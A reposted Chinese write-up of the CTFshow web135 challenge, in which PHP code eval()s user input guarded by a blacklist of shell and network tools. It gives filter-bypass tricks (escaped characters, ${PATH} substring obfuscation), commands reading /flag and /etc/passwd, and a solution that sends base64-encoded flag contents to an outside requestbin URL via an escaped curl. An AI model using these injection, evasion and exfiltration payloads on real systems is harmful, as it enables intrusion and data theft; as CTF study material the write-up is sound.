CTFshow php特性 web135
生活随笔
收集整理的這篇文章主要介紹了
CTFshow php特性 web135
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
目錄
- 源碼
- 思路
- 題解
- 總結(jié)
源碼
<?php/* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03*/error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){eval(substr($F,0,6));}else{die("師傅們居然破解了前面的,那就來一個(gè)加強(qiáng)版吧");} }思路
非預(yù)期
可以用這些繞過關(guān)鍵字過濾
\ ' "可以參考下我的博客
https://blog.csdn.net/Kracxi/article/details/121896054
下面可以選一個(gè)能用的輸出flag,curl不能用可以用ping
od nlnl${PATH:${#TERM}:${SHLVL:~A}}${PATH:${#RANDOM}:${#SHLVL:~A}}${PATH:~A}${PATH:${#RANDOM}:${#SHLVL:~A}}/bin/cat${HOME:${#}:${##}}???${HOME:${#}:${##}}??${HOME:${#HOSTNAME}:${#SHLVL}}xxd less ca\t ca''t more rev/bin/revfmt base64/bin/base64code=${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}tac | cat的倒序 tail php /flag sh /flag | 利用報(bào)錯(cuò)出flag paste /flag /etc/passwd | 可以兩個(gè)一起讀 diff /flag.txt /etc/passwd curl file:///flag sed -n "p" /flag bzless /flag bzmore /flag sort echo "[base64==]" | base64 -d | bash echo "[hex]" | xxd -r -p | bash盲注的話可以${string:start:length}來截取字符
題解
cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag | bas\e64` cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag2 | bas\e64`
拼一下就好了
總結(jié)
Y1ng師傅 yyds
總結(jié)
以上是生活随笔為你收集整理的CTFshow php特性 web135的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow php特性 web134
- 下一篇: 动态规划算法php,php算法学习之动态